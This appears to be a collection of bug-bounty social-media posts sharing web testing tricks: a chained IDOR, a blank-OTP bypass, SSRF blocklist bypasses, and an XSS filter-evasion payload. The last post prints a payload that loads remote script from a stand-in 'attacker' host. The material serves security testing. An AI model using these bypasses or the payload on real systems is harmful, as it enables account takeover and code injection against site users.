TechFenix

I recently encountered an IDOR : DELETE /api/notes/:id → tried deleting someone else’s note → 403 Forbidden (expected) PUT /api/notes/:id → tried editing the same note → success ✅, no authorization check After editing, DELETE /api/notes/:id → succeeded, could now delete the notes which was showing 403 forbidden earlier Reason: Likely edit endpoint mutated ownership or permission flags, letting delete pass. Tip: Always test chained actions, not just individual endpoints.

Found a very simple yet weird OTP bypass issue recently: Tried a normal flow: - Wrong OTP → rejected (expected behavior) - Blank value in OTP param → surprisingly accepted, allowing me to change account details without the correct OTP. So the server was verifying OTPs, but blank input just slipped through. Feels like a case of poor empty/null handling or some quirky backend logic. Developers, what could be the reason behind this behavior?

When testing for SSRF, you’ll often hit blocklist errors when targeting localhost or cloud metadata hosts. Here are some bypass techniques that consistently work for me: - Use a 303 redirect to an internal host — many apps follow redirects without validation & convert POST → GET - DNS tricks like https://t.co/pshzbZl7tT (resolves back to localhost) - Append @blacklistedDomain after a whitelisted URL/domain - Add # at the end of the domain if the backend appends paths/params when making request.

Recently encountered XSS filters blocking <script>, onerror, onclick, alert(), confirm(), etc. Used a full-page <div> (position:fixed;inset:0) to ensure onpointerover triggers immediately on any interaction on the page. Combined with dynamic import() inside setTimeout() for full JS execution: Final payload : <div style="position:fixed;inset:0;z:9k;pointer-events:auto" onpointerover="setTimeout(()=>import('//attacker/payload.js'),0),this.remove()"></div> It worked fluently :) #BugBounty